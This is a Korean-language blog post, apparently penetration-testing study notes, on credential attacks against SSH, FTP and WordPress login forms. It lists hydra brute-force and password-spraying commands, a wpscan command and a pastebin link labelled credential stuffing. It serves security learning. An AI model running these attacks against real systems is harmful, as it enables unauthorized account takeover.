해킹/호스트 기반 모의해킹

[ 호스트 기반 모의해킹 ] 계정 정보 기반 공격

Haemaa 2023. 10. 31. 23:28

hydra를 많이 씀.

 

hydra의 장점은 ssh, ftp, http 등등 여러 서비스에 공격을 할 수 있다는 점.

 

ssh나 ftp

 

hydra를 통해 ssh (22번 포트를 공격할 때)
hydra -L users.txt -P pass.txt ssh://ip -V -s 22

-V 옵션을 주면 어떤 과정으로 공격이 진행되는 지를 볼 수 있음.
-s 22 처럼 포트 번호는 안 줘도 되지만 주는 게 더 좋음.


hydra를 통해 ftp (21번 포트를 공격할 때)
hydra -L users.txt -P pass.txt ftp://ip -V -s 21

 

 

http

ssh나 ftp 같은 경우는 그냥 원라인으로 hydra를 통해 브루트포스가 가능하지만

http는 준비해야할 것이 있음.

 

- 어떤 url에서 로그인을 하는가를 알고 있어야 함.

그리고 burpsuite를 통해 패킷을 잡아서 어느 엔드포인트에서 로그인을 하는지, 어느 메소드를 쓰는지

어느 파라미터를 쓰는지를 체크 해야함.

ex)
엔드포인트 : wp-login.php

메소드 : POST

파라미터 : log, pwd

에러메시지를 확인해야 함. : Invalid username.

 

서비스에 따라 여러번의 bruteforce를 진행해야할 수도 있음.

hydra -L user.txt -p randompassword ip -s port http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid -V

:F를 통해 Invalid가 나오면 실패한거야 라고 컴퓨터에게 알려줌.

그 후에 username을 획득 후 한 번 더 password에 대해 hydra를 진행하면 됨.

 

 

 

 

wpscan

wpscan을 쓰면 알아서 username 먼저 찾아 주고 그 다음 password 브루트포스를 진행해주는 툴이다.

wpscan --url http://ip:port --passwords pass.txt

 

 

 

- 브루트포스

> hydra -L users.txt -P pass.txt ssh://<ip> -V -s <port>

> hydra -L users.txt -P pass.txt <ip> -s <port> http-post-form "/<endpoint>:username=^USER^&password=^PASS^:F=<error-message>" -V

 

- 비밀번호 스프레이

> hydra -L users.txt -p 'Winter2023!' ssh://<ip> -V

> hydra -L users.txt -p 'password1' ssh://<ip> -V

 

- 크리덴셜 스터핑

> https://pastebin.com/gqZZQqsh:v8PupCipie

 

- 디폴트 계정